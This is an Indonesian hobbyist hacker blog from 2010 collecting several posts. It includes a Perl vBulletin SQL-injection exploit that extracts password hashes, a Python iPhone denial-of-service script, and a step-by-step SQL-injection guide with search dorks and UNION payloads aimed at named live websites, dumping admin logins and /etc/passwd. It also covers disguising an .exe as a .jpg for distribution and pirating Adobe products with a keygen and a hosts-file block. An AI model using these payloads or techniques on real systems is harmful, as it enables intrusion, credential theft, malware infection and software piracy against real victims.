Minggu, 11 April 2010

Trik Mendownload Semua Produk Adobe... :D

trik mendownload semua produk Adobe... :D

nahh,, disini ketemu lagi dengan saya dengan tutorial ^ dan v

mari kita mulai...

1. masuk di Adobe Official Download page : http://www.adobe.com/downloads/

2. dan lo akan meilhat dan lo akan melihat semua jenis produk2 Adobe. mulai dari photoshop, premeire, illustrator, dan lain-lain...

3. pilihlah produk Adobe yang ingin anda download lalu klik TRY ..

4. setelah memasuki page selanjutnya, klik 'DOWNLOAD '

5. dan setelah itu , lo akan diminta login, kalo udah punya account login aja, kalo belum buat dulu.

6. setelah login in pilihlah versi menurut OS yang anda pakai [ in this case guaa pake winsuck..:P] , kemudian klik download.

7. lalu ada sebuah jendela baru yang akan terpop-up , jangan di close..!!, lalu akan terpop-up lagi jendela download, kemudian klik save file.

8. setelah di download, masuk ke tempat dimana lo menyimpan file akamaidownloadmanager.exe tadi, lalu di install.....

9. setelah diinstall download manager ini akan menanyakan dimana destinasi tempat anda menyimpan produk Adobe yang nantinya akan di download.

10. setelah selesai memilih, download akan dimulai secata otomatis, tunggulah sampai proses download selesai.

12. setelah didownload, bukalah file yang tadi lo download trus di extract .

13. layaknya winsuck, klik next, next, next untuk menginstall trial version.

14. sementara installer sedang berjalan, download file ini : http://ilix.in/qMi2N

15. setelah selesai diinstall, buka lah produk tadi yang anda download, maka akan muncul software setup, yang meminta anda untuk menggunakan trial version atau memasukan serial number.

16. sebelum itu, masuklah di C:\Windows\System32\drivers\etc\hosts

17. kemudian bukalah file hosts dalam bentuk notepad, dan masukan ini : 127.0.0.1      activate.adobe.com

18. kemudian di simpan.

19. setelah mendownload file yang tadi [http://ilix.in/qMi2N] bukalah keygen.exe. lalu , pilihlah produk Adobe yang ingin lo ambil SN-nya, lalu pastekan satu per satu di serial number bar pada software setup produk yang anda download.

20. selamat menikmati.. anda bisa menggunakan produk Adobe selamanya.... ^_^



Referensi :
- Google
- Percobaan Sendiri. . . :D



Semoga Dapat dicerna oleh pembaca, dan Mohon maaf bila ada kesalahan dalam penulisan kata-kata, Maklum saya masih Newbie -.-'



Best Regards,


Edelweize




Greetz ^_^

- TUHAN YANG MAHA ESA , yang masih memberikan kesempatan kepada saya untuk membuat blog, dan sharing pengetahuan yang saya punya.. :)
- Indonesian Hacker Team [ www.indonesianhacker.com ]
- TUSA CREW Minahasa Selatan [ www.tusacrew.co.tv ]
- Jatim Crew [ www.jatimcrew.org ]
- Palembang Hacker Link [www.palembanghackerlink.org ]
- Snutz [ www.snutz.us ]
- Hackers Center [ www.hackers-center.org ]
- Hacker Newbie [ www.hacker-newbie.org ]

Hapii Berthdeii Rue.... ^_^

Hapii Berthdeii Rue.... ^_^


haha...

akhirnya hari ini 11 April 2010 saya genap 17 tahun juga.... :D

makasih buat TUHAN YANG MAHA ESA yang telah menambahkan saya umur setahun lagi... :)

dan terima kasih buat teman teman saya :

- My Best Friend Chelly.. :D
- Bukan Nama Asli Kembali a.k.a Umz Master Kiky
- Green Cat a.k.a Umz Master Toefan
- Koya 777 a.k.a Master Ravelano
- Maverick a.k.a Chino
- Unkn0wn spy a.k.a Fajrin
- Tenshi a.k.a Udin
- X-Poison a.k.a Pramuda
- Takecy a.k.a Edy
- Cextor a.k.a Umz Master Uba
- all of t0k3k Miring Crew members
- semua yang udah ngucapin Selamat Ulang Tahun ama saya... ^_^

Makasih Yahh All.. tanpa kalian hidup aku gag akan berwarna-warni seperti ini... :D

dan untuk orang yang paling aku sayang n' cinta... [ciiieeeee... >.<]

makasih udah ngasih akuu hadiah yang terspesial yang gag akan pernah aku lupain,, selama ulang tahun ku ini.... :D
kado yang paling spesial buat aku.. >.< bisa dengar suaranya, dan juga canda tawanya.. ^^ Thx My God... :D
n thx juga buat My Princess Rindry <-- the special woman in my life ... ^_^



Regards,

Edelweize

Sabtu, 10 April 2010

Video Advance SQL Injection Method by Edelweize + Live Demo Malingshit Site..... :D

http://www.ziddu.com/download/9090016/Advance-SQLi-by-edelweize.rar.html

silahkan ditonton... :D

mohon komentarnya,,, soalnya videonya masih amburadul.... -.-'

Maklum Newbie........ -.-'


Best Regards,


Edelweize


Greetz :
- TUHAN YANG MAHA ESA , yang masih memberikan kesempatan kepada saya untuk membuat blog dan sharing pengetahuan saya
- Indonesian Hacker Team [ www.indonesianhacker.com ]
- TUSA CREW Minahasa Selatan [ www.tusacrew.co.tv ]
- Jatim Crew [ www.jatimcrew.org ]
- Palembang Hacker Link [www.palembanghackerlink.org ]
- Snutz [ www.snutz.us ]
- Hackers Center [ www.hackers-center.org ]
- Hacker Newbie [ www.hacker-newbie.org ]

Exploit - vBulletin 4.0.1 Remote SQL Injection

vBulletin 4.0.1 Remote SQL Injection



#!/usr/bin/perl
use IO::Socket;
if (!$ARGV[2]) {
print q{
    Usage: perl  VB4.0.1.pl host /directory/ victim_userid
       perl  VB4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

 if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

Phreaking - Apple iPhone / iPod touch remote DoS vulnerability

Apple iPhone / iPod touch remote DoS vulnerability

Python script.

 import socket
    import sys

    def Usage():
        print ("Usage: ./serversman.py \n")
        print ("Example: ./serversman.py 192.168.48.183\n")
    if len(sys.argv) <> 2:
            Usage()
            sys.exit(1)
    else:
        hostname = sys.argv[1]
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((hostname, 8080))
        print "[+] Connecting to the target.."
        except:
            print ("[-] Connection error!")
            sys.exit(1)
        print "[+] Sending payload"
        sock.send("HEAD / HTTP/1.0\r\n\r\n")
        r=sock.recv(1024)
        sock.close()
        print "[+] HTTP Server is now DoS attacked"

sys.exit(0);

Menyembunyikan File .exe ke .jpg

okee.. dalam tutorial kali ini, saya akan menjelaskan sedikit bagaimana cara menyembunyikan file .exe ke .jpg

mari mulai yuk..... :D

1) pertama2, bikin folder baru dolo.. [terserah di mana aja] trus liat di folder option kalo pilihan 'show hidden files and folders' udah tercentang dan ‘hide extensions for known file types’ TIDAK tercentang.

2) paste file .exe lo yang udah di copy ke folder yang udah lo buat tadi. contoh : 'facebook.exe'

3) trus, lo rename tuu 'facebook.exe' [terserah], contoh guaa rename : 'testing.jpeg'

4) windows akan memberikan peringatan kalo lo akan benar2 mengganti extensi .exe jadi .jpeg , klik aja 'yes'

5) sekarang yang file .exe yang udah lo rename ke .jpg tadi ['picture.jpeg'] bikin shortcut trus taruh di directory yang sama.

6) setelah bikin shortcutnya,, lo rename tuu shortcut [terserah], contoh : 'testing2.jpeg'.

7) klik kanan di shortcut yang udah lo rename tadi [testing2.jpeg] trus klik properties.

8) trus lo delete semua text yang ada di kotak 'Start In' dan biarkan kosong.

9) kemudian di kotak 'Target' tuliskan path ini : 'C:\WINDOWS\system32\cmd.exe /c testing2.jpeg'

10) di tulisan yang terakhir, 'c picture.jpeg' merupakan nama file yg pertama yg lo konfigurasi. kalo misalnya lo namai filenya 'filemanak2.avi' berarti lo ganti pathnya menjadi 'C:\WINDOWS\system32\cmd.exe /c filemanak2.avi'.

11) di dalam file 'testing2.jpeg' (shortcut), klik kanan trus pilih properties trus pilih change icon. akan terpopup jendela baru trus masukan text ini di field pathnya : %SystemRoot%\system32\SHELL32.dll . kemudian klik OK

12) kemudian buatlah 'Hidden' pada file yang pertama [bukan shortcut] 'testing.jpeg'

13) ingat.. file dan shortcut ini harus tetap ada dalam 1 directory.

14) agar lebih jreeng.. :) kompres ke dalam .zip ato .rar dan file siap di publikasikan..... :D



Semoga Dapat dicerna oleh pembaca, dan Mohon maaf bila ada kesalahan dalam penulisan kata-kata, Maklum saya masih Newbie -.-'



Best Regards,


Edelweize


Greetz :
- TUHAN YANG MAHA ESA , yang masih memberikan kesempatan kepada saya untuk membuat blog dan sharing pengetahuan saya
- Indonesian Hacker Team [ www.indonesianhacker.com ]
- TUSA CREW Minahasa Selatan [ www.tusacrew.co.tv ]
- Jatim Crew [ www.jatimcrew.org ]
- Palembang Hacker Link [www.palembanghackerlink.org ]
- Snutz [ www.snutz.us ]
- Hackers Center [ www.hackers-center.org ]
- Hacker Newbie [ www.hacker-newbie.org ]

Pengertian SQL Injection & Cara Mengimplementasikannya

1. Perkenalan

sedikit penjelasan, apakah yang dimaksud dengan SQL injection..?? SQL injection adalah serangan yang memanfaatkan kelalaian dari website yang mengijinkan user untuk menginputkan data tertentu tanpa melakukan filter terhadap malicious character. Inputan tersebut biasanya di masukan pada box search atau bagian-bagian tertentu dari website yang berinteraksi dengan database SQL dari situs tersebut. Perintah yang dimasukan para attacker biasanya adalah sebuah data yang mengandung link tertentu yang mengarahkan para korban ke website khusus yang digunakan para attacker untuk mengambil data pribadi korban.
Untuk menghindari link berbahaya dari website yang telah terinfeksi serangan SQL injection, Anda dapat menggunakan aplikasi tambahan seperti NoScript yang merupakan Add-ons untuk aplikasi web browser Firefox. Meskipun tidak terlalu sempurna, setidaknya Anda dapat mengurangi kemungkinan Anda menjadi korban.


2. bagaimana kita menemukan website yang vuln (kali ini saya menggunakan Google)

dalam Google terdapat banyak sekali kata kunci untuk menemukan website yang vuln
ada beberapa contoh kata kunci untuk menemukan website yang vuln :

inurl:content.php?id=
inurl:index.php?id=
inurl:main.php?id=
inurl:streampage.php?id=
inurl:base.php?id=
inurl:content.php?id=
inurl:catalog.php?id=
inurl:view.php?id=
inurl:detail.php?id=
inurl:page.php?id=

3. mencari vuln

contoh , Google memberikan kita link :

situs.com/index.php?id=1

memulai pencarian vuln di parameter ID

a. situs.com/index.php?id=1+and+1=1 (true dan true = true)
jika keluar halaman seperti id=1, mungkin itu merupakan vuln website

situs.com/index.php?id=1+and+1=2 (true dan true = false)
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable

b. situs.com/index.php?id=1'+and+'1'='1 (true dan true = true)
situs.com/index.php?id=1'+and+'1'='2 (true dan false = false)

c. situs.com/index.php?id=1"+and+"1"="1 (true dan true = true)
situs.com/index.php?id=1"+and+"1"="2 (true dan false = false)

d. situs.com/index.php?id=1+order+by+1--+
situs.com/index.php?id=1+order+by+1000+--+
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable

e. situs.com/index.php?id=1
situs.com/index.php?id=2-1

f. situs.com/index.php?id=1
situs.com/index.php?id=1*1

g. situs.com/index.php?id=
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable

h. mysite.com/index.php?id=1'
jika keluar halaman yang menemukan error, halaman kosong, atau redirect , berarti website itu mengandung vulnerable

i. mysite.com/index.php?id=1malingsial
"Unknown column '1malingsial' in 'where clause" <--- vuln

j. situs.com/index.php?id=1)/*

k. situs.com/index.php?id=1')--+

l. situs.com/index.php?id=1"/*

m. situs.com/index.php?id=1))--+


website yang vuln tidak hanya pada query ini aja "index.php?id=1:
situs.com/index.php/id/6/
situs.com/index.HTM?id=1

kenapa ditemukan error atau redirect????

okee agar dapat dimengerti, anda harus mempunyai kemampuan dalam pemrograman PHP dan MySql

disini saya akan menulis script PHP yang simple dengan vulnerable
$q = "SELECT id,info FROM mytable WHERE id=".$id;
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];


ketika saya menulis id=1 and 1 = 1:
$q = "SELECT id,info FROM mytable WHERE id=1 and 1=1";
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

dapat dilihat tidak ada error karna id = 1.


bila saya menulis id=1 and 1 = 2:
$q = "SELECT id,info FROM mytable WHERE id=1 and 1=2";
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

akan keluar error karena 1<>2.


jika saya menulis:
$q = "SELECT id,info FROM mytable WHERE id=".intval($id);
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];
atau
$q = "SELECT id,info FROM mytable WHERE id=' ".addslashes($id)." ' "; //without spaces
$r = mysql_query($q);
$result = mysql_fetch_row($r);
echo "myid ".$result[0]."
info".$result[1];

jika anda mengetikan id=1+and+1=2 maka akan diterima id=1 atau jika anda mengetikan 1' maka akan menerima 1 juga.


itu berarti anda dapat menjebol website tersebut dengan metode SQL-Injection.


4. Mencari nomor kolom.
dalam hal ini ada 2 untuk mencari nomor kolom:

a. situs.com/index.php?id=1+and+1=2+UNION+SELECT+1+--+
situs.com/index.php?id=1+and+1=2+UNION+SELECT+1,2+--+
situs.com/index.php?id=1+and+1=2+UNION+SELECT+1,2,3+--+
...
apakah jumlahnya lebih tinggi sedangkan anda tidak melihat angka..? (mungkin terdapat dalam source code)

b. menggunakan perintah " order by" (digunakan untuk mengurutkan kolom berdasarkan angka).
situs.com/index.php?id=1+order+by+1+--+ (tidak ada error)
situs.com/index.php?id=1+order+by+1000+--+ (bila disini keluar error berarti didalam query tidak mempunyai 1000 kolom)
situs.com/index.php?id=1+order+by+50+--+
...
jika tidak keluar error, contoh, kita anda mengetikan order+by+10, dan keluar error ketika anda mengetikan order+by+11+--+ berarti query tersebut hanya mempunyai 10 kolom.

jika anda menemukan nomor kolom (dalam hal ini 10) maka perintah yang harus diketikan :
situs.com/index.php?id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10+--+
atau
situs.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+--+
1+and+1=2 (true dan true=false) sama dengan id=-1  dan  1+and+1=1 (true dan true=true) sama dengan id=1


4.mengeluarkan database
sekarang kita akan mengeluarkan database

dalam hal ini saya sertakan dengan Live Demo:
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,3,4+--+
4 tabel, nomor kolom: 3


tapi sebelum itu, kita harus mencari database, user dan versi MySqlnya.
Berikut contoh pencarian database, user dan versi MySqlnya.
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,concat(version(),0x3a,database(),0x3a,user()),4+--+
0x3a - adalah konversi hex dari " : ".
anda juga dapat menggunakan syntax tanpa ():
version()=@@version
user()=CURRENT_USER

database    : ewpa_majster01
user        : ewpa_majster01@127.0.0.1
versi My SQL: 5.0.51a-24+lenny2+spu1-log



kemudian kita harus menemukan semua databasenya:
Berikut Syntax yang digunakan :
group_concat(schema_name) + from + information_schema.schemata
Berikut Contoh Pengeluaran Databasenya:
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,group_concat(schema_name),4+from+information_schema.schemata+--+
seperti yang kita liat ada 2 database : information_schema,ewpa_majster01


kemudian kita melanjutkan dengan mengeluarkan nama tabelnya:
berikut syntax yang digunakan :
group_concat(table_name) from information_schema.tables
Berikut contoh pengeluaran nama tabelnya :
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,group_concat(table_name),4+from+information_schema.tables+--+

karna cukup banyak nama tabelnya jadi saya tidak menulisnya disini... :)

karna kita tidak memerlukan tabel yang dari database "information_schema":
berikut syntax yang digunakan :
group_concat(table_name) from information_schema.tables + where + table_schema<>information_schema
Berikut Contoh pengeluaran nama tabel tanpa tabel dari database "information_schema" :
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+

696e666f726d6174696f6e5f736368656d61 = hasil konversi hex dari "information_schema"

tapi anda juga bisa mencoba ini:
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()+--+

kemudian kita harus menemukan kolomnya (dalam contoh saya mengambil tabel ewpa_user):
Berikut Syntax yang digunakan :
group_concat(column_name) + from + information_schema.columns + where + table_name=0xHEXDARINAMATABEL
Berikut contoh mengeluarkan kolom dari tabel :
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x657770615f75736572+--+

657770615f75736572 = hasil konversi hex dari tabel "ewpa_user"
daftar kolom-kolom : id,login,pass

Kemudian Langkah Selanjutnya adalah mengeluarkan seluruh isi kolom yang ada di dalam tabel
Berikut Syntax yang digunakan :
group_concat(nama kolom,[0x3a],nama kolom...) +from+nama tabel
Berikut contoh mengeluarkan seluruh isi kolom dari tabel :
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,group_concat(id,0x3a,login,0x3a,pass),4+from+ewpa_user+--+

Hasilnya : ID=1 login=admin pass=646224a5..., ID=2 login=dyalcom pass=098f6b...

jika anda ingin mengeluarkan hanya 1 per 1 isi kolom saja, gunakan syntax : LIMIT [row],columns_count:
Berikut contohnya :
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,schema_name,4+from+information_schema.schemata+LIMIT+0,4+--+
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,schema_name,4+from+information_schema.schemata+LIMIT+1,4+--+
http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,schema_name,4+from+information_schema.schemata+LIMIT+2,4+--+
...


Jika Keluar Error : "Illegal mix of collations" anda harus menggunakan perintah unhex(hex()) (contoh : unhex(hex(database())))


melihat password r00t:
berikut syntax yang digunakan :
situs.com/index.php?id=-1+union+select+1,2,LOAD_FILE('etc/passwd'),4+--+
atau
situs.com/index.php?id=-1+union+select+1,2,LOAD_FILE(0x2f6574632f706173737764),4+--+
contoh : http://www.webnewshub.com/index.php?rid=-116+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3+--+&rcid=2

jika anda mempunya password r00t anda bisa melakukan apapun diserver itu.. :) (contoh menggunakan program telnet)

5. 2 query
jika anda menginject website dengan 2 query anda tidak perlu menemukan nomor kolom lagi, karna akan keluar error :
Berikut Contoh Syntax yang digunakan untuk double query :
situs.com/index.php?id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST(user(),14)a)+as+t+JOIN+(SELECT+NAME_CONST(user(),14)a)b)c)


>v5.0.12
NAME_CONST(nama,value)

Bagaimana Query ini bekerja..?
gabungkan query kiri ke query kanan dengan satu nama kolom.





Sekian Sedikit Penjelasan Saya Tentang "Pengertian SQL Injection & Cara Mengimplementasikannya" .... :)
Semoga Dapat dicerna oleh pembaca, dan Mohon maaf bila ada kesalahan dalam penulisan kata-kata, Maklum saya masih Newbie -.-'



Best Regards,


Edelweize



Greetz :
- TUHAN YANG MAHA ESA , yang masih memberikan kesempatan kepada Saya untuk membuat Tulisan ini.
- Indonesian Hacker Team [ www.indonesianhacker.com ]
- TUSA CREW Minahasa Selatan [ www.tusacrew.co.tv ]
- Jatim Crew [ www.jatimcrew.org ]
- Palembang Hacker Link [www.palembanghackerlink.org ]
- Snutz [ www.snutz.us ]
- Hackers Center [ www.hackers-center.org ]
- Hacker Newbie [ www.hacker-newbie.org ]

Merekam IP yang masuk di web kita

IP logger adalah script utk me-log setiap IP Address yang masuk di web kita.

okeehh,, mari kita praktek.. :D

bikin file html kosong, trus kasih nama terserah lo (in this case guaa kasih nama "ipmu") jadi ipmu.html
kemudian file di index.php (halaman paling depan) sisipkan kode PHP berikut:

$ip = $_SERVER['REMOTE_ADDR'];
$pagina = $_SERVER['REQUEST_URI'];
$datum = date(“d-m-y / H:i:s”);
$invoegen = $datum . ” – ” . $ip . ” – ” . $pagina . ”
“;
$fopen = fopen(“ipmu.html”, “a”);
fwrite($fopen, $invoegen);
fclose($fopen);

trus, setel chmod file ipmu.html menjadi 777 (supaya dapat di tulis).

done… skarang open browser lo dan arahkan ke ipmu.html…



Greetz :
- TUHAN YANG MAHA ESA , yang masih memberikan kesempatan kepada Saya untuk membuat Tulisan ini.
- Hacker Newbie [ www.hacker-newbie.org ]
- Indonesian Hacker Team [ www.indonesianhacker.com ]
- TUSA CREW Minahasa Selatan [ www.tusacrew.co.tv ]
- Jatim Crew [ www.jatimcrew.org ]
- Palembang Hacker Link [www.palembanghackerlink.org ]
- Snutz [ www.snutz.us ]
- Hackers Center [ www.hackers-center.org ]

Welcome All.... :D

hehe....

sebenarnya siih,, kagak adan tujuan mauu bikin blog kek gini.... :)
tpi yahh,, ngilangin stres aja dahh... :) sambil nyoba kalo blogging tuu asik apa kagak.. :D

mungkin artikel2 akan segera di posting,,.... :D
tapi blum skarang.....

sibuk soalnya.. :D

okeee,, sekian dolo yahh.... :D

Happy Blogging,